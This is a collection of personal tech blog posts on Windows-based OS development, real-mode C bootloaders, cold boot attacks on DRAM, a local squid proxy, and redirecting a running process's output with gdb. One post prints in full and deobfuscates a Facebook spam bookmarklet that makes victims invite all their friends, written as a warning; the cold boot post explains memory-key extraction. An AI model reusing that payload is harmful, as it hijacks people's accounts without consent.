Writing kernel in Windows with Visual Studio C/C++

Most hobby osdev projects prefer *nix+gcc combination these days, primarily because there are a bunch of nice tutorials and examples available for them. Considering the flexibility, I too personally think it is a good choice. But if you are a heretic by nature and are curious about how you can osdev with just the express edition of Visual C++ and some other free software without leaving windows (or forced), this post is for you.

In this post I will simply demonstrate the toolchain setup. Complete package can be downloaded from the lower 'Downloads' section. The actual 'kernel' that is written in this tutorial is the lame hello-world one. We will get it working with PXE boot in VirtualBox (replace with any emulator of your choice). It works with default Windows Boot Manager (WBM) without modifications (GRUB equivalent, just lamer) and can easily be modified to work with mbr/vbr, booting with stages. Let's face it - even osdev noobs these days are so over floppies.

Kernel loader (stub)
For a kernel loader stage, there are many ways of entering protected mode, loading the actual kernel image, relocating and passing control to the kernel. Here is one that I think is simple enough to fit in a blogspot post.

The image loaded by PXE/WBM consists of two sections - the stub and the kernel executable image. Both PXE and WBM (are supposed to) load our image at physical address 0x7c00, or 7c0h:0h in real mode. This means that the stub must be 16bit real mode code that is statically linked to run at 7c00h. The kernel executable output by Visual C++ compiler cl.exe on the other hand is 32bit protected mode code. Also, the kernel executable needs to be relocated before it can be run. Thus, the stub must set up pmode, relocate the kernel to the address it is supposed to run and then pass control to it.

The stub in this tutorial is written in assembler for ease. I have used yasm, primarily because it supports both At&T and Intel syntax and it can output a flat binary.

stub.asm can be compiled as
This should create a flat binary for stub.

If you reached here, you probably know what you can/should and can/should not use in a kernel. I am assuming that you have some experience with writing such code in other toolchains.

The kernel for this tutorial is hilariously simple. It can be C or C++.


Here is the tricky part. We must compile kernel.cc in such a way that it can run standalone, without any ties with Windows hosted environment. For Visual C++ 2010, I have seen the following switches working. I am going to save on typing as MSDN has explanation for each of those switches in detail.

Creating the boot image
This is the simplest part.

Yay! Now you have a PXE/WBM bootable image!

PXE boot setup instructions (or lack thereof)
Unless you are using Windows Server as the host OS, chances are that you will have to work with a non-Microsoft solution for DHCP and TFTP servers with pxeboot support. I have used tftpd32 in the past as well as in this tutorial, and have had no complaints thus far. Setting up DHCP and TFTP servers is out of scope of this tutorial. tftpd32 configuration is a walk in the park. Just attach the DHCP and TFTP servers on local interface, set the TFTP root and file name as the boot image. Fire up any virtual machine emulator of your choice that supports PXE boot ROM in its NIC. I have used VirtualBox. Start the VM, boot from LAN. You should see some activity in tftpd32 and moments later you should see the message.

It is fairly easy to get your kernel alongside Windows entry in the Windows bootloader. There are tutorials [1, 2] to create new BCD entries. Just add your kernel as a BOOTSECTOR application. EasyBCD is an option in case you are not comfortable with bcdedit.

Using Visual C++ IDE
Sure, these build rules can be set in VC++ projects. Enjoy one-button-hit builds with VC++'s Intellisense. Eventually when you get a debugger stub in your kernel, you could also get source level debugging working within WinDbg.
32bit versions of yasm and tftpd32 are included.

Using Makefiles
I never felt comfortable when an IDE came between me and my source code custom build rules. If you too think that makefiles are the way to go, nmake works out of the box. I personally think CMake is a better choice if your project gets serious.
32bit versions of yasm and tftpd32 are included.

Please let me know if decide to use Microsoft compilers for osdev.

Good luck!

Cold boot attack

How safe and secure is your data when stored on a PC/workstation or a laptop? Say you also have whole disc/volume encryption, maybe activated by a USB key. Even then, how secure is your data?

If the computer is turned on when it physically falls in hands of the attacker, you might be at risk even with whole disc encryption enabled and the screen locked requiring your (non compromised) password. This is especially true for portable machines like laptops and net-books. There are many possible attacks, we will look into a specific one called cold boot attack in this post.

Something about memory

Chances are that your main memory is DRAM technology based, which includes popular ones such as SDRAM, DDRx and even the VRAM in most cases. As it is widely considered to be volatile type of memory, we are under the impression that it loses the stored contents after power is cut off. Sadly the contents are not lost instantaneously, but they decay/degrade gradually due to the way DRAM stores data.

Figure 0 : A DRAM Cell
Without going into the details of the dynamic logic, it suffices to say that the bit is stored as charge on a capacitor connected to the rest of the circuit with a transistor which acts like a switch. Simply put, if the capacitor has charge above a certain level, we interpret bit value 1, and 0 otherwise. (each CAS or bit line like the one shown in Figure 0 is actually a set of two bit lines, +ve and -ve which are connected to alternate cells/FETs in the row. When reading, after both bit lines have been precharged, RAS is activated and the sense amplifier kicks in. Due to positive feedback it can detect the slight charge difference between +ve and -ve bit lines.)

Capacitors are not perfect. They lose charge over time as leakage current. Thus, each DRAM cell has to be `refreshed' frequently enough to retain content. Even though manufacturers usually recommend the DRAM be refreshed at least every 64ms (to ensure that there is no data corruption), well built DRAMs have a retention period that is significantly greater than the suggested refresh period. It goes without saying that some bits do corrupt, but the rate at which they do is pretty low when you put 64ms in perspective. This is true even after turning the power off entirely.

How does this concern me?

Well, the significantly long retention period of main memory is a security hole. If a computer is physically compromised when it is powered on, the attacker can read most of the contents stored on your main memory. The main memory includes wealth of information : any user names and passwords that are `cached' by applications, encryption keys for hard drive/volume encryption as well as SSL private keys for active connections, and (maybe partial) contents of any file that is or was open in recent past (as after closing the file, most operating systems do not clear the corresponding memory pages used as block cache, for obvious performance reasons), including portions of deleted files at times as well. This is assuming the machine is locked in some sense, and the unlocking password is not known to the attacker.

At room temperature, the DRAM holds on to the stored bits if the power down/up cycle completes in 64ms. Errors are introduced as powered-off period increases. The period during which no or very few bits corrupt can be significantly increased if the DRAM modules are cooled to near or beyond 0 degree C. Such `cold' modules can then be inserted into another compatible machine and their contents dumped for detailed analysis. I believe that the reason for extended retention is because as the capacitors usually have Aluminum oxide as dielectric whose leakage current reduces as temperature reduces.

A very good paper from Princeton University discussing how to detect keys in the dumps is here. They claim to have broken almost every hard drive encryption solution there is :(. They also provide software to dump memory contents on a portable drive.

This technique is important for forensics/law enforcement as well. During a bust of a computer crime suspect, memory dumps of the machines are extremely important to support the case. This technique allows the law enforcers to get the system state or a snapshot as it was at the time of the bust even without the suspects' co-operation.

Note that the technique is ineffective against other types of memory, for example bistable latched SRAM. So in case you are wondering if you could get something out of the hard drive caches or something from the buffers of a compromised router, you are out of luck!

Does it really work? Can I see it working on my machine?


I've created a simple RAM browser (kernel) named `RAMBO' (download source) which, as the name says, can be used to browse the RAM contents after a simulated theft and cold reboot. You can choose to be super-realistic, pulling out the cord of your desktop or pulling out the battery of your laptop and putting it back in a jiffy. If you are worried about pulling the cord while windows/*NIX runs, you can choose to load a file to certain RAM location, reboot and check if the contents are readable after reboot. The program is to be loaded from a multiboot compliant bootloader such as GRUB. It does not touch any other piece of hardware than the processor, memory and keyboard, so rest assured that you will not have a corrupt disc or fried electronics. In case you do not have such a loader installed already, you can install the loader on a floppy or a USB stick and copy the program to it so that you can load it when you boot from USB/floppy. The README provides more info on how to use it.

Real mode in C with gcc : writing a bootloader

Usually the x86 boot loader is written in assembler. We will be exploring the possibility of writing one in C language (as much as possible) compiled with gcc, and runs in real mode. Note that you can also use the 16 bit bcc or TurboC compiler, but we will be focusing on gcc in this post. Most open source kernels are compiled with gcc, and it makes sense to write C bootloader with gcc instead of bcc as you get a much cleaner toolchain :)

As of today (20100614), gcc 4.4.4 officially only emits code for protected/long mode and does not support the real mode natively (this may change in future).

Also note that we will not discuss the very fundamentals of booting. This article is fairly advanced and assumes that you know what it takes to write a simple boot-loader in assembler. It is also expected that you know how to write gcc inline assembly. Not everything can be done in C!

getting the tool-chain working


As we will be running in 16 bit real mode, this tells gas that the assembler was generated by gcc and is intended to be run in real mode. With this directive, gas automatically adds addr32 prefix wherever required. For each C file which contains code to be run in real mode, this directive should be present at the top of effectively generated assembler code. This can be ensured by defining in a header and including it before any other.

This is great for bootloaders as well as parts of kernel that must run in real mode but are desired written in C instead of asm. In my opinion C code is a lot easier to debug and maintain than asm code, at expense of code size and performance at times.

Special linking

As bootloader is supposed to run at physical 0x7C00, we need to tell that to linker. The mbr/vbr should end with the proper boot signature 0xaa55.
All this can be taken care of by a simple linker script.

gcc emits elf binaries with sections, whereas a bootloader is a monolithic plain binary with no sections. Conversion from elf to binary can be done as follows:

The code

With the toolchain set up, we can start writing our hello world bootloader!
vbr.c (the only source file) looks something like this:

compile it as

and that should have created vbr.elf file (which you can use as a symbols file with gdb for source level debugging the vbr with gdbstub and qemu/bochs) as well as 512 byte vbr.bin. To test it, first create a dummy 1.44M floppy image, and overwrite it's mbr by vbr.bin with dd.

and now we are ready to test it out :D

and you should see the message!

Once you get to this stage, you are pretty much set with respect to the tooling itself. Now you can go ahead and write code to read the filesystem, search for next stage or kernel and pass control to it.

Here is a simple example of a floppy boot record with no filesystem, and the next stage or kernel written to the floppy immediately after the boot record. The next image LMA and entry are fixed in a bunch of macros. It simply reads the image starting one sector after boot record and passes control to it. There are many obvious holes, which I left open for sake of brevity.

removing __NOINLINE may result in even smaller code in this case. I had it in place so that I could figure out what was happening.

Concluding remarks

C in no way matches the code size and performance of hand tuned size/speed optimized assembler. Also, because of an extra byte (0x66, 0x67) wasted (in addr32) with almost every instruction, it is highly unlikely that you can cram up the same amount of functionality as assembler.

Global and static variables, initialized as well as uninitialized, can quickly fill those precious 446 bytes. Changing them to local and passing around instead may increase or decrease size; there is no thumb rule and it has to be worked out on per case basis. Same goes for function in-lining.

You also need to be extremely careful with various gcc optimization flags. For example, if you have a loop in your code whose number of iterations are small and deducible at compile time, and the loop body is relatively small (even 20 bytes), with default -Os, gcc will unroll that loop. If the loop is not unrolled (-fno-tree-loop-optimize), you might be able to shave off big chunk of bytes there. Same holds true for frame setups on i386 - you may want to get rid of them whenever not required using -fomit-frame-pointer. Moral of the story : you need to be extra careful with gcc flags as well as version update. This is not much of an issue for other real mode modules of the kernel where size is not of this prime importance.

Also, you must be very cautious with assembler warnings when compiling with .code16gcc. Truncation is common. It is a very good idea to use --save-temp and analyze the assembler code generated from your C and inline assembly. Always take care not to mess with the C calling convention in inline assembly and meticulously check and update the clobber list for inline assembly doing BIOS or APM calls (but you already knew it, right?).

It is likely that you want to switch to protected/long mode as early as possible, though. Even then, I still think that maintainability wins over asm's size/speed in case of a bootloader as well as the real mode portions of the kernel.

It would be interesting if someone could try this with c++/java/fortran. Please let me know if you do!

How not to look like a fool on facebook

I did it already. Warning you so that you don't.

There is a full blown army of apps on Facebook which spam your friends with recommendations without your consent. Going by Facebook's policies, these apps are spam, and you should report them as soon as possible.

They are named in interesting ways. When you click the link, it first shows a button.
Let us take an example of 'Is this dog ugly?'.

As it came from a credible friend, you go ahead and click the button,

and do as you are told to do so, expecting some image with fancy javascript animation.

you paste the code and hit enter, and wait for it.
Before you know it, it has sent invitations to your friends, and you end up looking like a fool!

This is how it works :

the script you copy looks something like this:

javascript:(function(){a = "app120196878004524_jop"; b = "app120196878004524_jode"; ifc = "app120196878004524_ifc"; ifo = "app120196878004524_ifo"; mw = "app120196878004524_mwrapper"; function ff(p, a, c, k, e, r) { e = function (c) { return (c < a ? "" : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36)); }; if (!"".replace(/^/, String)) { while (c--) {r[e(c)] = k[c] || e(c);}k = [function (e) {return r[e];}];e = function () {return "\\w+";};c = 1; } while (c--) { if (k[c]) {p = p.replace(new RegExp("\\b" + e(c) + "\\b", "g"), k[c]);} } return p; } str = ff("J e=[\"\\n\\g\\j\\g\\F\\g\\i\\g\\h\\A\",\"\\j\\h\\A\\i\\f\",\"\\o\\f\\h\\q\\i\\f\\r\\f\\k\\h\\K\\A\\L\\t\",\"\\w\\g\\t\\t\\f\\k\",\"\\g\\k\\k\\f\\x\\M\\N\\G\\O\",\"\\n\\l\\i\\y\\f\",\"\\j\\y\\o\\o\\f\\j\\h\",\"\\i\\g\\H\\f\\r\\f\",\"\\G\\u\\y\\j\\f\\q\\n\\f\\k\\h\\j\",\"\\p\\x\\f\\l\\h\\f\\q\\n\\f\\k\\h\",\"\\p\\i\\g\\p\\H\",\"\\g\\k\\g\\h\\q\\n\\f\\k\\h\",\"\\t\\g\\j\\z\\l\\h\\p\\w\\q\\n\\f\\k\\h\",\"\\j\\f\\i\\f\\p\\h\\v\\l\\i\\i\",\"\\j\\o\\r\\v\\g\\k\\n\\g\\h\\f\\v\\P\\u\\x\\r\",\"\\B\\l\\Q\\l\\R\\B\\j\\u\\p\\g\\l\\i\\v\\o\\x\\l\\z\\w\\B\\g\\k\\n\\g\\h\\f\\v\\t\\g\\l\\i\\u\\o\\S\\z\\w\\z\",\"\\j\\y\\F\\r\\g\\h\\T\\g\\l\\i\\u\\o\"];d=U;d[e[2]](V)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];s=d[e[2]](e[6]);m=d[e[2]](e[7]);c=d[e[9]](e[8]);c[e[11]](e[10],I,I);s[e[12]](c);C(D(){W[e[13]]()},E);C(D(){X[e[16]](e[14],e[15])},E);C(D(){m[e[12]](c);d[e[2]](Y)[e[4]]=d[e[2]](Z)[e[5]]},E);", 62, 69, "||||||||||||||_0x95ea|x65|x69|x74|x6C|x73|x6E|x61||x76|x67|x63|x45|x6D||x64|x6F|x5F|x68|x72|x75|x70|x79|x2F|setTimeout|function|5000|x62|x4D|x6B|true|var|x42|x49|x48|x54|x4C|x66|x6A|x78|x2E|x44|document|mw|fs|SocialGraphManager|ifo|ifc|||||||".split("|"), 0, {})})();

With slightly better formatting, it looks like

   k=[function(e){return r[e]}];
   if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);
  return p
 ('J e=["\\n\\g\\j\\g\\F\\g\\i\\g\\h\\A","\\j\\h\\A\\i\\f","\\o\\f\\h\\q\\i\\f\\r\\f\\k\\h\\K\\A\\L\\t","\\w\\g\\t\\t\\f\\k","\\g\\k\\k\\f\\x\\M\\N\\G\\O","\\n\\l\\i\\y\\f","\\j\\y\\o\\o\\f\\j\\h","\\i\\g\\H\\f\\r\\f","\\G\\u\\y\\j\\f\\q\\n\\f\\k\\h\\j","\\p\\x\\f\\l\\h\\f\\q\\n\\f\\k\\h","\\p\\i\\g\\p\\H","\\g\\k\\g\\h\\q\\n\\f\\k\\h","\\t\\g\\j\\z\\l\\h\\p\\w\\q\\n\\f\\k\\h","\\j\\f\\i\\f\\p\\h\\v\\l\\i\\i","\\j\\o\\r\\v\\g\\k\\n\\g\\h\\f\\v\\P\\u\\x\\r","\\B\\l\\Q\\l\\R\\B\\j\\u\\p\\g\\l\\i\\v\\o\\x\\l\\z\\w\\B\\g\\k\\n\\g\\h\\f\\v\\t\\g\\l\\i\\u\\o\\S\\z\\w\\z","\\j\\y\\F\\r\\g\\h\\T\\g\\l\\i\\u\\o"];d=U;d[e[2]](V)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];s=d[e[2]](e[6]);m=d[e[2]](e[7]);c=d[e[9]](e[8]);c[e[11]](e[10],I,I);s[e[12]](c);C(D(){W[e[13]]()},E);C(D(){X[e[16]](e[14],e[15])},E);C(D(){m[e[12]](c);d[e[2]](Y)[e[4]]=d[e[2]](Z)[e[5]]},E);',62,69,'||||||||||||||_0x95ea|x65|x69|x74|x6C|x73|x6E|x61||x76|x67|x63|x45|x6D||x64|x6F|x5F|x68|x72|x75|x70|x79|x2F|setTimeout|function|5000|x62|x4D|x6B|true|var|x42|x49|x48|x54|x4C|x66|x6A|x78|x2E|x44|document|mw|fs|SocialGraphManager|ifo|ifc|||||||'.split('|'),0,{})

now, let us drop the last parentheses () and check what code this actually executes:

a = "app120196878004524_jop";
b = "app120196878004524_jode";
ifc = "app120196878004524_ifc";
ifo = "app120196878004524_ifo";
mw = "app120196878004524_mwrapper";
function ff(p, a, c, k, e, r) {
 e = function (c) {
  return (c < a ? "" : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36));
 if (!"".replace(/^/, String)) {
  while (c--) {r[e(c)] = k[c] || e(c);}k = [function (e) {return r[e];}];e = function () {return "\\w+";};c = 1;
 while (c--) {
  if (k[c]) {p = p.replace(new RegExp("\\b" + e(c) + "\\b", "g"), k[c]);}
 return p;
str = ff("J e=[\"\\n\\g\\j\\g\\F\\g\\i\\g\\h\\A\",\"\\j\\h\\A\\i\\f\",\"\\o\\f\\h\\q\\i\\f\\r\\f\\k\\h\\K\\A\\L\\t\",\"\\w\\g\\t\\t\\f\\k\",\"\\g\\k\\k\\f\\x\\M\\N\\G\\O\",\"\\n\\l\\i\\y\\f\",\"\\j\\y\\o\\o\\f\\j\\h\",\"\\i\\g\\H\\f\\r\\f\",\"\\G\\u\\y\\j\\f\\q\\n\\f\\k\\h\\j\",\"\\p\\x\\f\\l\\h\\f\\q\\n\\f\\k\\h\",\"\\p\\i\\g\\p\\H\",\"\\g\\k\\g\\h\\q\\n\\f\\k\\h\",\"\\t\\g\\j\\z\\l\\h\\p\\w\\q\\n\\f\\k\\h\",\"\\j\\f\\i\\f\\p\\h\\v\\l\\i\\i\",\"\\j\\o\\r\\v\\g\\k\\n\\g\\h\\f\\v\\P\\u\\x\\r\",\"\\B\\l\\Q\\l\\R\\B\\j\\u\\p\\g\\l\\i\\v\\o\\x\\l\\z\\w\\B\\g\\k\\n\\g\\h\\f\\v\\t\\g\\l\\i\\u\\o\\S\\z\\w\\z\",\"\\j\\y\\F\\r\\g\\h\\T\\g\\l\\i\\u\\o\"];d=U;d[e[2]](V)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];s=d[e[2]](e[6]);m=d[e[2]](e[7]);c=d[e[9]](e[8]);c[e[11]](e[10],I,I);s[e[12]](c);C(D(){W[e[13]]()},E);C(D(){X[e[16]](e[14],e[15])},E);C(D(){m[e[12]](c);d[e[2]](Y)[e[4]]=d[e[2]](Z)[e[5]]},E);", 62, 69, "||||||||||||||_0x95ea|x65|x69|x74|x6C|x73|x6E|x61||x76|x67|x63|x45|x6D||x64|x6F|x5F|x68|x72|x75|x70|x79|x2F|setTimeout|function|5000|x62|x4D|x6B|true|var|x42|x49|x48|x54|x4C|x66|x6A|x78|x2E|x44|document|mw|fs|SocialGraphManager|ifo|ifc|||||||".split("|"), 0, {});

// and lets print the string that gets evaluated

which, when executed with `js' gives output

var _0x95ea=[ "\x76\x69\x73\x69\x62\x69\x6C\x69\x74\x79",

note that executing print(_0x95ea); gives


so, the final code that gets executed is


Essentially the script automatically brings up `suggest to friends' window listing all friends, selects all and submits the invitation request on your behalf (using MouseEvents with setTimeout).

Note that the code template is same for all these kind of applications. Just the application specific IDs ("app120196878004524_jop" etc.) change.

In general, whenever someone asks you to execute some piece of javascript in address bar, consider it harmful. In this case they do not steal your identity, so no worries; but you have every reason to believe the next such application will.

Take care.

Authenticated corporate proxy woes - Local squid cache peer proxy

How many times has it happened at school or work that the software you want to use needs to connect to the Internet can not get through the stupid proxy? I know I've suffered a lot due to this. Moreover, looks like companies such as Nokia, Ubisoft etc. do not really care about people behind authenticated proxies either. It is really surprising (and annoying) to see so many nice software without support for authenticated proxies. That also includes the all new `awesome' (sarcasm intended) chat client that comes by default in Ubuntu called Empathy.

Or are you otherwise pissed off because you have to type your proxy authentication in all those different places? There are KDE settings, GNOME settings, (e)links, subversion config, yum/apt configuration, entering password a thousand times when firefox(pre-3.6) tries to find updates after restart and reopen all those tabs etc. etc., or IE settings for windows users, the "netsh winhttp set proxy" method to get your Windows 7 updates through the proxy?

Yes. Very, very annoying.

What if you could delegate the authentication to some other service running on and strictly for your computer only? How about your own proxy server running on your machine that delegates requests to your organization's proxy with proper authentication so that you no longer have to worry about authentication?

Running local squid

The basic idea is this : we run a local instance of squid which runs as a peer proxy to the organization's proxy, with authentication on your behalf. This means that now you can set proxy as localhost and connect - the authentication will be taken care of by local squid copy. Not just that, it also reduces some load on your organization's proxy, as it also caches (static by default) content.

Just append these lines to your /etc/squid/squid.conf

cache_peer proxy.addr parent [proxy.addr proxy port] [proxy.addr icp port]  
default no-query login=[login_name]:[pass]

# to bypass the proxy for local or LAN access
acl local_domain dstdomain *.local.domain
acl local_nat dst
always_direct allow local_domain
always_direct allow local_nat

# everything else must pass through the parent. No direct access allowed.
never_direct allow all

Let us dissect the config:
  • cache_peer proxy.addr tells squid to work as a peer proxy to your organization's proxy. 
  • parent tells squid that proxy.addr is one of it's parents in the cache hierarchy.
  • [my.proxy.address proxy port] the port on which organization's proxy accepts connections.
  • [my.proxy.address icp port] the port on which organization's proxy listens for ICP requests.
Now the `option'
  • no-query in case your proxy does not provide ICP support, or you do not want to enable it, providing this clause will stop our squid from sending ICP requests and reduce unnecessary delays. 
  • login=[login_name]:[pass] self explanatory.

Note that you need to take care of forwarding any special ports your applications might need.

This method works only for basic authentication (base64 encode method).

There are some obvious security concerns. First, your password is stored in plaintext - make sure that non-root users have *no* permissions on /etc/squid/squid.conf. Also make sure that this proxy accepts connections only from local host. There still is a security hole, in that in case someone logs into your machine as a normal or guest user, even he can use your connection.

This method works on all UNIces, Linux as well as Windows.

Continue running a non nohup-ed command after logout (no SIGHUP)

Many times it happens that you start a command that takes fairly long time to complete, and before it ends, you must log out for some reason - maybe the network will go down soon or you do not want to keep staring at the screen till it completes, or you just don't want to keep that terminal around.

A bit of shell behaviour for the uninformed. When you launch a command in a shell, the new process is created by fork()ing the current shell and immediately exec()ing the command executable/binary, which means the new process is a child of the shell process. You can stop the running process and keep it running in background as

% java some.long.running.application
{java program spits out something}
{hit ^z}
zsh: suspended  java some.long.running.application
% bg
[1]  + continued  java some.long.running.application

or you can start it in background as

% java some.long.running.application &
[1]  1001
{java program spits out something}

of course you can bring these jobs in foreground any time you want

% jobs
[1]  - running    iostat -xd 100
[2]  + running    java some.long.running.application
[3]  + suspended  ~/bin/startOfflineIMAP.sh
% fg %2 {bash users must drop the %}
[2]    running    java some.long.running.application
{java program spits out something}

Now you want to log out. The moment you log out of the terminal, the shell process sends SIGHUP signal to all running children and SIGCONT->SIGHUP for all stopped children. The default behaviour of an application after receiving SIGHUP is to exit. Any applications - foreground, as well as background, that were started from this shell are killed. We want our application to survive after logout.

The textbook way of doing this is to start the command with `nohup' as

% nohup java some.long.running.application &
[1] 1001
% logout

or the subshell trick :

% (java some.long.running.application &)
% {prompt returns, java disowned}
{java program spits out something}

zsh users can do it as :

% java some.long.running.application &!
% {prompt returns, java disowned}
{java program spits out something}

Or use the good old screen (my favorite)!

Unfortunately you did not start the process with nohup or subshell trick, and say the process can not be restarted because of some reason or it has done significant work already.

What if we could tell the shell not to send SIGHUP to a particular child?
`disown' command lets you do just that! :D

% jobs
[1]  - running    iostat -xd 100
[2]  + running    java some.long.running.application
[3]  + suspended  ~/bin/startOfflineIMAP.sh
% disown %2 {bash users must drop the %, also bashers can add -h option}
{java program spits out something}

This tells the shell not to send SIGHUP to our precious java process. And you'd think you can now happily log out with java process still running.

Well, not quite. Say the shell has pid 1000 and java process has pid 1001, then

% ls -l /proc/1000/fd
total 0
lrwx------. {...} 0 -> /dev/pts/1
lrwx------. {...} 1 -> /dev/pts/1
lrwx------. {...} 2 -> /dev/pts/1

% ls -l /proc/1001/fd
total 0
lrwx------. {...} 0 -> /dev/pts/1
lrwx------. {...} 1 -> /dev/pts/1
lrwx------. {...} 2 -> /dev/pts/1

Which means process 1001 uses terminal /dev/pts/1 as it's stdin, stdout and stderr. Even if we disown the java process, when the shell quits, terminal device /dev/pts/1 will not be available, and hence next read or write by java process to any of stdin/stdout/stderr will probably result in an abort. Even if it does not abort, you might want to capture stdout and stderr of the program somewhere to a file maybe, and possibly feed some file to it as input. That is not possible as

% ls -l /proc/1000/fd
total 0
lrwx------. {...} 0 -> /dev/pts/1 (deleted)
lrwx------. {...} 1 -> /dev/pts/1 (deleted)
lrwx------. {...} 2 -> /dev/pts/1 (deleted)

Sad, isn't it?

Not quite!

Let us analyze how nohup works. If output of nohup is not redirected to some file, by default all the output of nohup-ed program goes to some default file (such as $HOME/nohup.out or $PWD/nohup.out). In any case, nohup has a writeable file descriptor to the file where output is supposed to go. Immediately after fork() but before exec(), nohup duplicates this fd to stdout and stderr using dup2(). This way, the child can keep running after being released from the shell without SIGHUP (which means it's parent=1), as stdout and stderr fds are still valid because they no longer are the fds of parent shell but fds of some real file opened. Stdin is probably uncared for as we are running the process in background, non-interactive mode after all.

The question is : all this is fine as it is done _before_ starting the java process. What can we do to change it's stdout and stderr _after_ it has been launched already?
Note that we can not modify /proc/1001/fd/1 to link to some real file (me wonders what issues would creep up if it was allowed).

Our good old friend gdb comes to rescue! The solution is trivial. Just attach the process, open a file you want the output to go to within that program with open() and dup2() the new fd to 1 and 2 :D

% gdb -p 1001
Attaching to process 1001
Reading symbols from /usr/bin/java...(no debugging symbols found)...done.
(gdb) call open("/home/prashant/tmp/output", O_WRONLY | O_CREAT | O_APPEND)
$1 = 5
(gdb) call dup2(5,1)
$2 = 1
(gdb) call open("/home/prashant/tmp/output.err", O_WRONLY | O_CREAT | O_APPEND)
$1 = 6
(gdb) call dup2(6,2)
$3 = 2
(gdb) detach 
Detaching from program: /usr/bin/java, process 1001
(gdb) quit

In case debug info is not available, you can replace the O_ macros to actual values in fcntl.h

(gdb) call dup2(open("/home/prashant/tmp/output", 0x209),1)
$2 = 1
(gdb) call dup2(open("/home/prashant/tmp/output.err", 0x209),2)
$3 = 2
(gdb) detach

Note that you can redirect stdin and stdout in same file if you wish (just be careful with append mode on NFS and truncate mode in general ;).

And that's about it. Go ahead and logout. Your process should be busy while you are gone.

PS : this will work as long as the program does not try to read anything from stdin. If and when it does, it may crash depending on whether the program abort()s when it can not do basic IO on fds 0,1 and 2. You might want to open another file to read and use dup2() in similar way if you plan to provide input from a file.